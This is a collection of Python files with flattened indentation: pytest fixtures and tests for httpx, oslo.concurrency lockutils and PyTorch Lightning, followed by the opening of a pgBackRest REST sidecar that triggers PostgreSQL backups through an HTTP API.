self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def testCustomJMXMetric(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 0)
self.assertTrue(len([t for t in metrics if "cassandra.db." in t['metric'] and "instance:cassandra_instance" in t['tags']]) > 40, metrics)
|
conftest.py
|
import asyncio
import os
import threading
import time
import typing
import pytest
import trustme
from cryptography.hazmat.primitives.serialization import (
BestAvailableEncryption,
Encoding,
PrivateFormat,
)
from uvicorn.config import Config
from uvicorn.main import Server
from httpx import URL, AsyncioBackend
ENVIRONMENT_VARIABLES = (
"SSL_CERT_FILE",
"REQUESTS_CA_BUNDLE",
"CURL_CA_BUNDLE",
"HTTP_PROXY",
"HTTPS_PROXY",
"ALL_PROXY",
"NO_PROXY",
"SSLKEYLOGFILE",
)
@pytest.fixture(scope="function", autouse=True)
def clean_environ() -> typing.Iterator[None]:
"""Keeps os.environ clean for every test without having to mock os.environ"""
original_environ = os.environ.copy()
for key in ENVIRONMENT_VARIABLES:
os.environ.pop(key, None)
yield
os.environ.clear()
os.environ.update(original_environ)
@pytest.fixture(params=[pytest.param(AsyncioBackend, marks=pytest.mark.asyncio)])
def backend(request):
backend_cls = request.param
return backend_cls()
async def app(scope, receive, send):
assert scope["type"] == "http"
if scope["path"] == "/slow_response":
await slow_response(scope, receive, send)
elif scope["path"].startswith("/status"):
await status_code(scope, receive, send)
elif scope["path"].startswith("/echo_body"):
await echo_body(scope, receive, send)
elif scope["path"].startswith("/echo_headers"):
await echo_headers(scope, receive, send)
else:
await hello_world(scope, receive, send)
async def hello_world(scope, receive, send):
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def slow_response(scope, receive, send):
await asyncio.sleep(0.1)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def status_code(scope, receive, send):
status_code = int(scope["path"].replace("/status/", ""))
await send(
{
"type": "http.response.start",
"status": status_code,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def echo_body(scope, receive, send):
body = b""
more_body = True
while more_body:
message = await receive()
body += message.get("body", b"")
more_body = message.get("more_body", False)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": body})
async def echo_headers(scope, receive, send):
body: bytes = b""
more_body = scope.get("headers", [])
for h in more_body:
name, value = h[0], h[1]
value = f"{name.capitalize().decode()}: {value.decode()}\n"
body += value.encode()
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": body})
class CAWithPKEncryption(trustme.CA):
"""Implementation of trustme.CA() that can emit
private keys that are encrypted with a password.
"""
@property
def encrypted_private_key_pem(self):
return trustme.Blob(
self._private_key.private_bytes(
Encoding.PEM,
PrivateFormat.TraditionalOpenSSL,
BestAvailableEncryption(password=b"password"),
)
)
SERVER_SCOPE = "session"
@pytest.fixture(scope=SERVER_SCOPE)
def example_cert():
ca = CAWithPKEncryption()
ca.issue_cert("example.org")
return ca
@pytest.fixture(scope=SERVER_SCOPE)
def cert_pem_file(example_cert):
with example_cert.cert_pem.tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def cert_private_key_file(example_cert):
with example_cert.private_key_pem.tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def cert_encrypted_private_key_file(example_cert):
with example_cert.encrypted_private_key_pem.tempfile() as tmp:
yield tmp
class TestServer(Server):
@property
def url(self) -> URL:
protocol = "https" if self.config.is_ssl else "http"
return URL(f"{protocol}://{self.config.host}:{self.config.port}/")
def install_signal_handlers(self) -> None:
# Disable the default installation of handlers for signals such as SIGTERM,
# because it can only be done in the main thread.
pass
async def serve(self, sockets=None):
self.restart_requested = asyncio.Event()
loop = asyncio.get_event_loop()
tasks = {
loop.create_task(super().serve(sockets=sockets)),
loop.create_task(self.watch_restarts()),
}
await asyncio.wait(tasks)
async def restart(self) -> None:
# Ensure we are in an asyncio environment.
assert asyncio.get_event_loop() is not None
# This may be called from a different thread than the one the server is
# running on. For this reason, we use an event to coordinate with the server
# instead of calling shutdown()/startup() directly.
self.restart_requested.set()
self.started = False
while not self.started:
await asyncio.sleep(0.5)
async def watch_restarts(self):
while True:
if self.should_exit:
return
try:
await asyncio.wait_for(self.restart_requested.wait(), timeout=0.1)
except asyncio.TimeoutError:
continue
self.restart_requested.clear()
await self.shutdown()
await self.startup()
@pytest.fixture
def restart(backend):
"""Restart the running server from an async test function.
This fixture deals with possible differences between the environment of the
test function and that of the server.
"""
async def restart(server):
await backend.run_in_threadpool(AsyncioBackend().run, server.restart)
return restart
def serve_in_thread(server: Server):
thread = threading.Thread(target=server.run)
thread.start()
try:
while not server.started:
time.sleep(1e-3)
yield server
finally:
server.should_exit = True
thread.join()
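# Usage note: delegate from a session-scoped fixture with `yield from`, as the
# `server` and `https_server` fixtures below do.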
@pytest.fixture(scope=SERVER_SCOPE)
def server():
config = Config(app=app, lifespan="off", loop="asyncio")
server = TestServer(config=config)
yield from serve_in_thread(server)
@pytest.fixture(scope=SERVER_SCOPE)
def https_server(cert_pem_file, cert_private_key_file):
config = Config(
app=app,
lifespan="off",
ssl_certfile=cert_pem_file,
ssl_keyfile=cert_private_key_file,
port=8001,
loop="asyncio",
)
server = TestServer(config=config)
yield from serve_in_thread(server)
|
test_lockutils.py
|
# Copyright 2011 Justin Santa Barbara
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import multiprocessing
import os
import signal
import subprocess
import sys
import tempfile
import threading
import time
from oslo_config import cfg
from oslotest import base as test_base
import six
from oslo_concurrency.fixture import lockutils as fixtures
from oslo_concurrency import lockutils
from oslo_config import fixture as config
if sys.platform == 'win32':
import msvcrt
else:
import fcntl
def lock_file(handle):
if sys.platform == 'win32':
msvcrt.locking(handle.fileno(), msvcrt.LK_NBLCK, 1)
else:
fcntl.flock(handle, fcntl.LOCK_EX | fcntl.LOCK_NB)
def unlock_file(handle):
if sys.platform == 'win32':
msvcrt.locking(handle.fileno(), msvcrt.LK_UNLCK, 1)
else:
fcntl.flock(handle, fcntl.LOCK_UN)
def lock_files(handles_dir, out_queue):
with lockutils.lock('external', 'test-', external=True):
# Open some files we can use for locking
handles = []
for n in range(50):
path = os.path.join(handles_dir, ('file-%s' % n))
handles.append(open(path, 'w'))
# Loop over all the handles and try locking the file
# without blocking, keep a count of how many files we
# were able to lock and then unlock. If the lock fails
# we get an IOError and bail out with bad exit code
count = 0
for handle in handles:
try:
lock_file(handle)
count += 1
unlock_file(handle)
except IOError:
os._exit(2)
finally:
handle.close()
return out_queue.put(count)
class LockTestCase(test_base.BaseTestCase):
def setUp(self):
super(LockTestCase, self).setUp()
self.config = self.useFixture(config.Config(lockutils.CONF)).config
def test_synchronized_wrapped_function_metadata(self):
@lockutils.synchronized('whatever', 'test-')
def foo():
"""Bar."""
pass
self.assertEqual('Bar.', foo.__doc__, "Wrapped function's docstring "
"got lost")
self.assertEqual('foo', foo.__name__, "Wrapped function's name "
"got mangled")
def test_lock_internally_different_collections(self):
s1 = lockutils.Semaphores()
s2 = lockutils.Semaphores()
trigger = threading.Event()
who_ran = collections.deque()
def f(name, semaphores, pull_trigger):
with lockutils.internal_lock('testing', semaphores=semaphores):
if pull_trigger:
trigger.set()
else:
trigger.wait()
who_ran.append(name)
threads = [
threading.Thread(target=f, args=(1, s1, True)),
threading.Thread(target=f, args=(2, s2, False)),
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertEqual([1, 2], sorted(who_ran))
def test_lock_internally(self):
"""We can lock across multiple threads."""
saved_sem_num = len(lockutils._semaphores)
seen_threads = list()
def f(_id):
with lockutils.lock('testlock2', 'test-', external=False):
for x in range(10):
seen_threads.append(_id)
threads = []
for i in range(10):
thread = threading.Thread(target=f, args=(i,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
self.assertEqual(100, len(seen_threads))
# Looking at the seen threads, split it into chunks of 10, and verify
# that the last 9 match the first in each chunk.
for i in range(10):
for j in range(9):
self.assertEqual(seen_threads[i * 10],
seen_threads[i * 10 + 1 + j])
self.assertEqual(saved_sem_num, len(lockutils._semaphores),
"Semaphore leak detected")
def test_lock_internal_fair(self):
"""Check that we're actually fair."""
def f(_id):
with lockutils.lock('testlock', 'test-',
external=False, fair=True):
lock_holder.append(_id)
lock_holder = []
threads = []
# While holding the fair lock, spawn a bunch of threads that all try
# to acquire the lock. They will all block. Then release the lock
# and see what happens.
with lockutils.lock('testlock', 'test-', external=False, fair=True):
for i in range(10):
thread = threading.Thread(target=f, args=(i,))
threads.append(thread)
thread.start()
# Allow some time for the new thread to get queued onto the
# list of pending writers before continuing. This is gross
# but there's no way around it without using knowledge of
# fasteners internals.
time.sleep(0.5)
# Wait for all threads.
for thread in threads:
thread.join()
self.assertEqual(10, len(lock_holder))
# Check that the threads each got the lock in fair order.
for i in range(10):
self.assertEqual(i, lock_holder[i])
def test_fair_lock_with_semaphore(self):
def do_test():
s = lockutils.Semaphores()
with lockutils.lock('testlock', 'test-', semaphores=s, fair=True):
pass
self.assertRaises(NotImplementedError, do_test)
def test_nested_synchronized_external_works(self):
"""We can nest external syncs."""
self.config(lock_path=tempfile.mkdtemp(), group='oslo_concurrency')
sentinel = object()
@lockutils.synchronized('testlock1', 'test-', external=True)
def outer_lock():
@lockutils.synchronized('testlock2', 'test-', external=True)
def inner_lock():
return sentinel
return inner_lock()
self.assertEqual(sentinel, outer_lock())
def _do_test_lock_externally(self):
"""We can lock across multiple processes."""
children = []
for n in range(50):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(
target=lock_files,
args=(tempfile.mkdtemp(), queue))
proc.start()
children.append((proc, queue))
for child, queue in children:
child.join()
count = queue.get(block=False)
self.assertEqual(50, count)
def test_lock_externally(self):
self.config(lock_path=tempfile.mkdtemp(), group='oslo_concurrency')
self._do_test_lock_externally()
def test_lock_externally_lock_dir_not_exist(self):
lock_dir = tempfile.mkdtemp()
os.rmdir(lock_dir)
self.config(lock_path=lock_dir, group='oslo_concurrency')
self._do_test_lock_externally()
def test_lock_with_prefix(self):
# TODO(efried): Embetter this test
self.config(lock_path=tempfile.mkdtemp(), group='oslo_concurrency')
foo = lockutils.lock_with_prefix('mypfix-')
with foo('mylock', external=True):
# We can't check much
pass
def test_synchronized_with_prefix(self):
lock_name = 'mylock'
lock_pfix = 'mypfix-'
foo = lockutils.synchronized_with_prefix(lock_pfix)
@foo(lock_name, external=True)
def bar(dirpath, pfix, name):
return True
lock_dir = tempfile.mkdtemp()
self.config(lock_path=lock_dir, group='oslo_concurrency')
self.assertTrue(bar(lock_dir, lock_pfix, lock_name))
def test_synchronized_without_prefix(self):
self.config(lock_path=tempfile.mkdtemp(), group='oslo_concurrency')
@lockutils.synchronized('lock', external=True)
def test_without_prefix():
# We can't check much
pass
test_without_prefix()
    def test_synchronized_prefix_without_hyphen(self):
        self.config(lock_path=tempfile.mkdtemp(), group='oslo_concurrency')
        @lockutils.synchronized('lock', 'hyphen', True)
        def test_without_hyphen():
            # We can't check much
            pass
        test_without_hyphen()
def test_contextlock(self):
self.config(lock_path=tempfile.mkdtemp(), group='oslo_concurrency')
# Note(flaper87): Lock is not external, which means
# a semaphore will be yielded
with lockutils.lock("test") as sem:
if six.PY2:
self.assertIsInstance(sem, threading._Semaphore)
else:
self.assertIsInstance(sem, threading.Semaphore)
# NOTE(flaper87): Lock is external so an InterProcessLock
# will be yielded.
with lockutils.lock("test2", external=True) as lock:
self.assertTrue(lock.exists())
with lockutils.lock("test1", external=True) as lock1:
self.assertIsInstance(lock1, lockutils.InterProcessLock)
def test_contextlock_unlocks(self):
self.config(lock_path=tempfile.mkdtemp(), group='oslo_concurrency')
with lockutils.lock("test") as sem:
if six.PY2:
self.assertIsInstance(sem, threading._Semaphore)
else:
self.assertIsInstance(sem, threading.Semaphore)
with lockutils.lock("test2", external=True) as lock:
self.assertTrue(lock.exists())
# NOTE(flaper87): Lock should be free
with lockutils.lock("test2", external=True) as lock:
self.assertTrue(lock.exists())
# NOTE(flaper87): Lock should be free
# but semaphore should already exist.
with lockutils.lock("test") as sem2:
self.assertEqual(sem, sem2)
def _test_remove_lock_external_file(self, lock_dir, use_external=False):
lock_name = 'mylock'
lock_pfix = 'mypfix-remove-lock-test-'
if use_external:
lock_path = lock_dir
else:
lock_path = None
lockutils.remove_external_lock_file(lock_name, lock_pfix, lock_path)
for ent in os.listdir(lock_dir):
            self.assertFalse(ent.startswith(lock_pfix))
def test_remove_lock_external_file(self):
lock_dir = tempfile.mkdtemp()
self.config(lock_path=lock_dir, group='oslo_concurrency')
self._test_remove_lock_external_file(lock_dir)
def test_remove_lock_external_file_lock_path(self):
self._test_remove_lock_external_file(tempfile.mkdtemp(),
use_external=True)
def test_no_slash_in_b64(self):
# base64(sha1(foobar)) has a slash in it
with lockutils.lock("foobar"):
pass
def test_deprecated_names(self):
paths = self.create_tempfiles([['fake.conf', '\n'.join([
'[DEFAULT]',
'lock_path=foo',
'disable_process_locking=True'])
]])
conf = cfg.ConfigOpts()
conf(['--config-file', paths[0]])
conf.register_opts(lockutils._opts, 'oslo_concurrency')
self.assertEqual('foo', conf.oslo_concurrency.lock_path)
self.assertTrue(conf.oslo_concurrency.disable_process_locking)
class FileBasedLockingTestCase(test_base.BaseTestCase):
def setUp(self):
super(FileBasedLockingTestCase, self).setUp()
self.lock_dir = tempfile.mkdtemp()
def test_lock_file_exists(self):
lock_file = os.path.join(self.lock_dir, 'lock-file')
@lockutils.synchronized('lock-file', external=True,
lock_path=self.lock_dir)
def foo():
self.assertTrue(os.path.exists(lock_file))
foo()
def test_interprocess_lock(self):
lock_file = os.path.join(self.lock_dir, 'processlock')
pid = os.fork()
if pid:
# Make sure the child grabs the lock first
start = time.time()
while not os.path.exists(lock_file):
if time.time() - start > 5:
self.fail('Timed out waiting for child to grab lock')
time.sleep(0)
lock1 = lockutils.InterProcessLock('foo')
lock1.lockfile = open(lock_file, 'w')
# NOTE(bnemec): There is a brief window between when the lock file
# is created and when it actually becomes locked. If we happen to
# context switch in that window we may succeed in locking the
# file. Keep retrying until we either get the expected exception
# or timeout waiting.
while time.time() - start < 5:
try:
lock1.trylock()
lock1.unlock()
time.sleep(0)
except IOError:
# This is what we expect to happen
break
else:
self.fail('Never caught expected lock exception')
# We don't need to wait for the full sleep in the child here
os.kill(pid, signal.SIGKILL)
else:
try:
lock2 = lockutils.InterProcessLock('foo')
lock2.lockfile = open(lock_file, 'w')
have_lock = False
while not have_lock:
try:
lock2.trylock()
have_lock = True
except IOError:
pass
finally:
# NOTE(bnemec): This is racy, but I don't want to add any
# synchronization primitives that might mask a problem
# with the one we're trying to test here.
time.sleep(.5)
os._exit(0)
def test_interthread_external_lock(self):
call_list = []
@lockutils.synchronized('foo', external=True, lock_path=self.lock_dir)
def foo(param):
"""Simulate a long-running threaded operation."""
call_list.append(param)
# NOTE(bnemec): This is racy, but I don't want to add any
# synchronization primitives that might mask a problem
# with the one we're trying to test here.
time.sleep(.5)
call_list.append(param)
def other(param):
foo(param)
thread = threading.Thread(target=other, args=('other',))
thread.start()
# Make sure the other thread grabs the lock
# NOTE(bnemec): File locks do not actually work between threads, so
# this test is verifying that the local semaphore is still enforcing
# external locks in that case. This means this test does not have
# the same race problem as the process test above because when the
# file is created the semaphore has already been grabbed.
start = time.time()
while not os.path.exists(os.path.join(self.lock_dir, 'foo')):
if time.time() - start > 5:
self.fail('Timed out waiting for thread to grab lock')
time.sleep(0)
thread1 = threading.Thread(target=other, args=('main',))
thread1.start()
thread1.join()
thread.join()
self.assertEqual(['other', 'other', 'main', 'main'], call_list)
def test_non_destructive(self):
lock_file = os.path.join(self.lock_dir, 'not-destroyed')
with open(lock_file, 'w') as f:
f.write('test')
with lockutils.lock('not-destroyed', external=True,
lock_path=self.lock_dir):
with open(lock_file) as f:
self.assertEqual('test', f.read())
class LockutilsModuleTestCase(test_base.BaseTestCase):
def setUp(self):
super(LockutilsModuleTestCase, self).setUp()
self.old_env = os.environ.get('OSLO_LOCK_PATH')
if self.old_env is not None:
del os.environ['OSLO_LOCK_PATH']
def tearDown(self):
if self.old_env is not None:
os.environ['OSLO_LOCK_PATH'] = self.old_env
super(LockutilsModuleTestCase, self).tearDown()
def test_main(self):
script = '\n'.join([
'import os',
'lock_path = os.environ.get("OSLO_LOCK_PATH")',
'assert lock_path is not None',
'assert os.path.isdir(lock_path)',
])
argv = ['', sys.executable, '-c', script]
retval = lockutils._lock_wrapper(argv)
self.assertEqual(0, retval, "Bad OSLO_LOCK_PATH has been set")
def test_return_value_maintained(self):
script = '\n'.join([
'import sys',
'sys.exit(1)',
])
argv = ['', sys.executable, '-c', script]
retval = lockutils._lock_wrapper(argv)
self.assertEqual(1, retval)
def test_direct_call_explodes(self):
cmd = [sys.executable, '-m', 'oslo_concurrency.lockutils']
with open(os.devnull, 'w') as devnull:
retval = subprocess.call(cmd, stderr=devnull)
self.assertEqual(1, retval)
class TestLockFixture(test_base.BaseTestCase):
def setUp(self):
super(TestLockFixture, self).setUp()
self.config = self.useFixture(config.Config(lockutils.CONF)).config
self.tempdir = tempfile.mkdtemp()
def _check_in_lock(self):
self.assertTrue(self.lock.exists())
def tearDown(self):
self._check_in_lock()
super(TestLockFixture, self).tearDown()
def test_lock_fixture(self):
# Setup lock fixture to test that teardown is inside the lock
self.config(lock_path=self.tempdir, group='oslo_concurrency')
fixture = fixtures.LockFixture('test-lock')
self.useFixture(fixture)
self.lock = fixture.lock
class TestGetLockPath(test_base.BaseTestCase):
def setUp(self):
super(TestGetLockPath, self).setUp()
self.conf = self.useFixture(config.Config(lockutils.CONF)).conf
def test_get_default(self):
lockutils.set_defaults(lock_path='/the/path')
self.assertEqual('/the/path', lockutils.get_lock_path(self.conf))
def test_get_override(self):
lockutils._register_opts(self.conf)
self.conf.set_override('lock_path', '/alternate/path',
group='oslo_concurrency')
self.assertEqual('/alternate/path', lockutils.get_lock_path(self.conf))
|
conftest.py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
from http.server import SimpleHTTPRequestHandler
import sys
import threading
import pytest
import torch.multiprocessing as mp
def pytest_configure(config):
config.addinivalue_line("markers", "spawn: spawn test in a separate process using torch.multiprocessing.spawn")
def _spawn_entry(rank, testfunction, testargs):
    # entry point for torch.multiprocessing.spawn; `rank` is supplied by spawn itself
    testfunction(*testargs)
@pytest.mark.tryfirst
def pytest_pyfunc_call(pyfuncitem):
    if pyfuncitem.get_closest_marker("spawn"):
        testfunction = pyfuncitem.obj
        funcargs = pyfuncitem.funcargs
        testargs = tuple([funcargs[arg] for arg in pyfuncitem._fixtureinfo.argnames])
        mp.spawn(_spawn_entry, (testfunction, testargs))
        return True
@pytest.fixture
def tmpdir_server(tmpdir):
if sys.version_info >= (3, 7):
Handler = partial(SimpleHTTPRequestHandler, directory=str(tmpdir))
from http.server import ThreadingHTTPServer
else:
# unfortunately SimpleHTTPRequestHandler doesn't accept the directory arg in python3.6
# so we have to hack it like this
import os
class Handler(SimpleHTTPRequestHandler):
def translate_path(self, path):
# get the path from cwd
path = super().translate_path(path)
# get the relative path
relpath = os.path.relpath(path, os.getcwd())
# return the full path from root_dir
return os.path.join(str(tmpdir), relpath)
# ThreadingHTTPServer was added in 3.7, so we need to define it ourselves
from http.server import HTTPServer
from socketserver import ThreadingMixIn
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
daemon_threads = True
with ThreadingHTTPServer(('localhost', 0), Handler) as server:
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
yield server.server_address
server.shutdown()
|
pgbackrest-rest.py
|
#!/usr/bin/python3
"""
The purpose of this script/program is to be able to trigger backups using an api.
The reason to not have the CronJob execute the backup but only to trigger the backup
is as follows:
- a Kubernetes Cronjob is running in its own pod (different from the database)
- the backup process requires direct access to the data files
- therefore the backup process needs to run inside the same pod
as the database
- therefore a CronJob cannot execute the backup process itself
By creating this script, we can run this in a sidecar container inside the same pod as
the database. As it has an api, we can extend the api so backups become discoverable.
To ensure we don't do very silly stuff, we will only allow 1 backup to take place at any given
time. Ensuring we have long running tasks and are still responsive and sending out
timely diagnostic messages pretty much means we have multiple threads. That's why multithreading
is thrown in the mix.
Apart from the main thread we use 3 more threads:
1. HTTPServer
2. Backup
3. History
The HTTPServer is a regular HTTPServer with an extra Event thrown in to allow communication
with the other thread(s).
The backup thread its sole purpose is to run the backup once triggered using the api.
The history will gather metadata about backups from pgBackRest using a scheduled interval, or when
triggered by the backup thread.
Doing multithreading in Python is pretty much ok for this task; this program is not here
to do a lot of heavy lifting, only ensuring backups are being triggered. All the work is
done by pgBackRest.
"""
import argparse
import datetime
import io
import json
import logging
import os
import signal
import sys
import time
import urllib.parse
from http import HTTPStatus
from http.server import BaseHTTPRequestHandler, HTTPServer
from subprocess import Popen, PIPE, check_output, STDOUT
from threading import Thread, Event, Lock
# We only ever want a single backup to be actively running. We have a global object that we share
# between the HTTP and the backup threads. Concurrent write access is prevented by a Lock and an Event
backup_history = dict()
current_backup = None
stanza = None
EPOCH = datetime.datetime(1970, 1, 1, 0, 0, 0).replace(tzinfo=datetime.timezone.utc)
LOGLEVELS = {'debug': 10, 'info': 20, 'warning': 30, 'error': 40, 'critical': 50}
def parse_arguments(args):
"""Parse the specified arguments"""
parser = argparse.ArgumentParser(description="This program provides an api to pgBackRest",
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=40, width=120))
parser.add_argument('--loglevel', help='Explicitly provide loglevel', default='info', choices=list(LOGLEVELS.keys()))
parser.add_argument('-p', '--port', help='http listen port', type=int, default=8081)
parser.add_argument('-s', '--stanza', help='stanza to be used by pgBackRest', default=os.environ.get('PGBACKREST_STANZA', None))
parsed = parser.parse_args(args or [])
return parsed
def utcnow():
"""Wraps around datetime utcnow to provide a consistent way of returning a truncated now in utc"""
return datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).replace(microsecond=0)
def json_serial(obj):
"""JSON serializer for objects not serializable by default json code"""
if isinstance(obj, (datetime.datetime,)):
return obj.isoformat()
elif isinstance(obj, (datetime.timedelta,)):
return obj.total_seconds()
elif isinstance(obj, (PostgreSQLBackup,)):
return obj.details()
raise TypeError("Type %s not serializable" % type(obj))
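# Illustrative usage: json.dumps({'at': utcnow()}, default=json_serial) renders
# the datetime as an ISO-8601 string instead of raising TypeError.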
class PostgreSQLBackup ():
"""This Class represents a single PostgreSQL backup
Metadata of the backup is kept, as well as output from the actual backup command."""
    def __init__(self, stanza, request=None, status='REQUESTED', started=None, finished=None):
self.started = started or utcnow()
self.finished = finished
self.pgbackrest_info = {}
self.label = self.started.strftime('%Y%m%d%H%M%S')
self.request = request or {}
self.stanza = stanza
self.pid = None
self.request.setdefault('command', 'backup')
self.request.setdefault('type', 'full')
if self.request and self.request.get('command', 'backup') != 'backup':
raise ValueError('Invalid command ({0}), supported commands: backup'.format(self.request['command']))
self.status = status
self.returncode = None
def info(self):
info = {'label': self.label, 'status': self.status, 'started': self.started, 'finished': self.finished}
info['pgbackrest'] = {'label': self.pgbackrest_info.get('label')}
return info
def details(self):
details = self.info()
details['returncode'] = self.returncode
details['pgbackrest'] = self.pgbackrest_info
details['pid'] = self.pid
if self.started:
details['duration'] = (self.finished or utcnow()) - self.started
details['age'] = (utcnow() - self.started)
return details
def run(self):
"""Runs pgBackRest as a subprocess
reads stdout/stderr and immediately logs these as well"""
logging.info("Starting backup")
self.status = 'RUNNING'
cmd = ['pgbackrest',
'--stanza={0}'.format(self.stanza),
'--log-level-console=off',
'--log-level-stderr=warn',
self.request['command'],
'--type={0}'.format(self.request['type'])]
# We want to augment the output with our default logging format,
# that is why we send both stdout/stderr to a PIPE over which we iterate
try:
p = Popen(cmd, stdout=PIPE, stderr=STDOUT)
self.pid = p.pid
for line in io.TextIOWrapper(p.stdout, encoding="utf-8"):
if line.startswith('WARN'):
loglevel = logging.WARNING
elif line.startswith('ERROR'):
loglevel = logging.ERROR
else:
loglevel = logging.INFO
logging.log(loglevel, line.rstrip())
self.returncode = p.wait()
self.finished = utcnow()
# As many things can - and will - go wrong when calling a subprocess, we will catch and log that
# error and mark this backup as having failed.
except OSError as oe:
logging.exception(oe)
self.returncode = -1
logging.debug('Backup details\n{0}'.format(json.dumps(self.details(), default=json_serial, indent=4, sort_keys=True)))
if self.returncode == 0:
self.status = 'FINISHED'
logging.info('Backup successful: {0}'.format(self.label))
else:
self.status = 'ERROR'
logging.error('Backup {0} failed with returncode {1}'.format(self.label, self.returncode,))
class EventHTTPServer(HTTPServer):
"""Wraps around HTTPServer to provide a global Lock to serialize access to the backup"""
def __init__(self, backup_trigger, *args, **kwargs):
HTTPServer.__init__(self, *args, **kwargs)
self.backup_trigger = backup_trigger
self.lock = Lock()
class RequestHandler(BaseHTTPRequestHandler):
"""Serves the API for the pgBackRest backups"""
def _write_response(self, status_code, body, content_type='text/html', headers=None):
self.send_response(status_code)
headers = headers or {}
if content_type:
headers['Content-Type'] = content_type
for name, value in headers.items():
self.send_header(name, value)
self.end_headers()
self.wfile.write(body.encode('utf-8'))
def _write_json_response(self, status_code, body, headers=None):
contents = json.dumps(body, sort_keys=True, indent=4, default=json_serial)
self._write_response(status_code, contents, content_type='application/json', headers=headers)
# We override the default BaseHTTPRequestHandler.log_message to have uniform logging output to stdout
def log_message(self, format, *args):
logging.info(("%s - - %s\n" % (self.address_string(), format % args)).rstrip())
def do_GET(self):
"""List the backup(s) that can be identified through the path or query parameters
Api:
/backups/ list all backups
/backups/{label} get specific backup info for given label
accepts timestamp label as well as pgBackRest label
/backups/{latest} shorthand for getting the backup info for the latest backup
Query parameters:
status filter all backups for given status
Example: /backups/latest?status=ERROR
Would list the last backup that failed
"""
global backup_history
url = urllib.parse.urlsplit(self.path)
query = urllib.parse.parse_qs(url.query)
# /backups/ list all backups
backup_labels = sorted(backup_history, key=lambda b: backup_history[b].label)
if query.get('status', None):
for b in backup_labels[:]:
if backup_history[b].status not in [s.upper() for s in query['status']]:
backup_labels.remove(b)
if url.path == '/backups' or url.path == '/backups/':
body = [backup_history[b].info() for b in backup_labels]
self._write_json_response(status_code=200, body=body)
# /backups/{label} get specific backup info
# /backups/latest shorthand for getting the backup info for the latest backup
elif url.path.startswith('/backups/backup'):
backup_label = url.path.split('/')[3]
backup = None
if backup_label == 'latest' and backup_labels:
backup_label = backup_labels[-1]
backup = backup_history.get(backup_label, None)
# We also allow the backup label to be the one specified by pgBackRest
if backup is None:
for b in backup_history.values():
                    if b.pgbackrest_info.get('label') == backup_label:
                        backup = b
if backup is None:
self._write_response(status_code=HTTPStatus.NOT_FOUND, body='')
else:
self._write_json_response(status_code=HTTPStatus.OK, body=backup.details())
else:
self._write_response(status_code=HTTPStatus.NOT_FOUND, body='')
return
def do_POST(self):
"""POST a request to backup the database
If no backup is currently running, will trigger the backup thread to
start a backup that conforms to the request
"""
global backup_history, current_backup, stanza
url = urllib.parse.urlsplit(self.path)
if url.path == '/backups' or url.path == '/backups/':
try:
content_len = int(self.headers.get('Content-Length', 0))
post_body = json.loads(self.rfile.read(content_len).decode("utf-8")) if content_len else None
with self.server.lock:
if self.server.backup_trigger.is_set():
headers = {'Location': '/backups/backup/{0}'.format(current_backup.label)}
self._write_json_response(status_code=HTTPStatus.CONFLICT, body={'error': 'backup in progress'}, headers=headers)
else:
self.server.backup_trigger.set()
current_backup = PostgreSQLBackup(request=post_body, stanza=stanza)
backup_history[current_backup.label] = current_backup
                        # We wait up to a second in case we quickly run into an error which we can report
max_time = time.time() + 1
while not current_backup.finished and time.time() < max_time:
time.sleep(0.1)
if current_backup.finished:
if current_backup.returncode == 0:
self._write_json_response(status_code=HTTPStatus.OK, body=current_backup.details())
else:
self._write_json_response(status_code=HTTPStatus.INTERNAL_SERVER_ERROR, body=current_backup.details())
else:
headers = {'Location': '/backups/backup/{0}'.format(current_backup.label)}
self._write_json_response(status_code=HTTPStatus.ACCEPTED, body=current_backup.details(), headers=headers)
except json.JSONDecodeError:
self._write_json_response(status_code=HTTPStatus.BAD_REQUEST, body={'error': 'invalid json document'})
except ValueError as ve:
self._write_json_response(status_code=HTTPStatus.BAD_REQUEST, body={'error': str(ve)})
else:
self._write_response(status_code=HTTPStatus.NOT_FOUND, body='')
def backup_poller(backup_trigger, history_trigger, shutdown_trigger):
"""Run backups every time the backup_trigger is fired
Will stall for long amounts of time as backups can take hours/days.
"""
global backup_history, current_backup
logging.info('Starting loop waiting for backup events')
